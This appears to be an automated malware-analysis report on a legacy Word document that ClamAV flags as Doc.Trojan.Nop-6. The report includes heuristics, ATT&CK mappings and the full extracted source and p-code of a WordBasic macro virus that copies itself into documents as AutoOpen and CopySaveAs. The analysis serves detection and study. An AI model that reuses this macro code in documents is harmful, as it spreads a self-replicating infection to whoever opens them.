MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro and a FileSaveAs macro. The macros are designed to copy themselves and rename them to 'CopySaveAs' and 'AutoOpen' respectively, indicating an attempt to ensure execution on file save or open events. The ClamAV detection as 'Doc.Trojan.Nop-6' further supports its malicious nature. The specific IOCs are the names of the macros and their copied variants.
Heuristics 4
-
ClamAV: Doc.Trojan.Nop-6 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Nop-6
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4263 bytes |
SHA-256: 1a4d236a2ad440291881e5159f5ed4cb9abab8860b1e23e1add0eaef24ed66cd |
|||
|
Detection
ClamAV:
Doc.Trojan.Nop-6
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FileSaveAs"
Public Sub MAIN()
Dim Who$
Rem /////////////////////////////////
Rem /Made in Jakutsk by me /
Rem /That's engoy to prove my power /
Rem /Say by to you files /
Rem / :) /
Rem /////////////////////////////////
On Error GoTo -1: On Error GoTo lll
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
Who$ = WordBasic.[FileNameInfo$](WordBasic.[FileName$](), 4)
WordBasic.MacroCopy "FileSaveAs", Who$ + ":CopySaveAs"
WordBasic.MacroCopy "CopyOpen", Who$ + ":AutoOpen"
WordBasic.FileSaveAs dlg
lll:
End Sub
Attribute VB_Name = "CopyOpen"
Public Sub MAIN()
Dim Who$
Rem /////////////////////////////////
Rem /Made in Jakutsk by me /
Rem /That's engoy to prove my power /
Rem /Say by to you files /
Rem / :) /
Rem /////////////////////////////////
Who$ = WordBasic.[FileNameInfo$](WordBasic.[FileName$](), 4)
WordBasic.MacroCopy Who$ + ":CopySaveAs", "FileSaveAs"
WordBasic.MacroCopy Who$ + ":AutoOpen", "CopyOpen"
End Sub
' Processing file: /opt/analyzer/scan_staging/01c6b75228754fb5b20bcc92623435c7.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/FileSaveAs - 1962 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn Who
' Line #3:
' Rem 0x0022 " /////////////////////////////////"
' Line #4:
' Rem 0x0022 " /Made in Jakutsk by me /"
' Line #5:
' Rem 0x0022 " /That's engoy to prove my power /"
' Line #6:
' Rem 0x0022 " /Say by to you files /"
' Line #7:
' Rem 0x0022 " / :) /"
' Line #8:
' Rem 0x0022 " /////////////////////////////////"
' Line #9:
' OnError <crash>
' BoS 0x0000
' OnError lll
' Line #10:
' Dim
' VarDefn dlg (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set dlg
' Line #11:
' Ld dlg
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSaveAs 0x0001
' Line #12:
' Ld dlg
' Ld WordBasic
' MemLd Dialog
' ArgsMemCall FileSaveAs 0x0001
' Line #13:
' Ld dlg
' MemLd Format$
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' Ld dlg
' MemSt Format$
' EndIf
' Line #14:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitDI2 0x0004
' Ld WordBasic
' ArgsMemLd [FileNameInfo$] 0x0002
' St Who$
' Line #15:
' LitStr 0x000A "FileSaveAs"
' Ld Who$
' LitStr 0x000B ":CopySaveAs"
' Add
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #16:
' LitStr 0x0008 "CopyOpen"
' Ld Who$
' LitStr 0x0009 ":AutoOpen"
' Add
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #17:
' Ld dlg
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #18:
' Label lll
' Line #19:
' EndSub
' Macros/VBA/CopyOpen - 1557 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn Who
' Line #3:
' Rem 0x0022 " /////////////////////////////////"
' Line #4:
' Rem 0x0022 " /Made in Jakutsk by me /"
' Line #5:
' Rem 0x0022 " /That's engoy to prove my power /"
' Line #6:
' Rem 0x0022 " /Say by to you files /"
' Line #7:
' Rem 0x0022 " / :) /"
' Line #8:
' Rem 0x0022 " /////////////////////////////////"
' Line #9:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitDI2 0x0004
' Ld WordBasic
' ArgsMemLd [FileNameInfo$] 0x0002
' St Who$
' Line #10:
' Ld Who$
' LitStr 0x000B ":CopySaveAs"
' Add
' LitStr 0x000A "FileSaveAs"
' Ld WordBasic
' ArgsMemCall MacroCopy 0x00
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.